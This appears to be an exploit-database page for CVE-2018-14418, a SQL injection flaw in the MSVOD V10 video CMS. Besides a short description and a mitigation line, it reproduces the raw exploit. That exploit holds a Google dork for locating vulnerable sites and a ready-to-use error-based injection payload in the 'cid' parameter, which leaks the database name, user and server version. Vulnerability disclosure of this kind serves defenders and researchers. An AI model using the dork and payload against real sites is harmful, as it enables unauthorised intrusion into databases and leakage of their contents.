header-logo
Suggest Exploit
vendor:
MSVOD
by:
Hzllaga
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: MSVOD
Affected Version From: MSVOD V10
Affected Version To: MSVOD V10
Patch Exists: NO
Related CWE: CVE-2018-14418
CPE: a:msvod:msvod:10
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018

MSVOD V10 ¡V SQL Injection

MSVOD V10 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to the database, user and version information.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: MSVOD V10 ¡V SQL Injection
# Google Dork: inurl:"images/lists?cid=13"
# Date: 2018/07/17
# Exploit Author: Hzllaga
# Vendor Homepage: http://www.msvod.cc/
# Version: MSVOD V10
# CVE : CVE-2018-14418
#Reference : https://www.wtfsec.org/2583/msvod-v10-sql-injection/

Payload:
/images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20

Navigation

Suggest Exploit

Services By CQR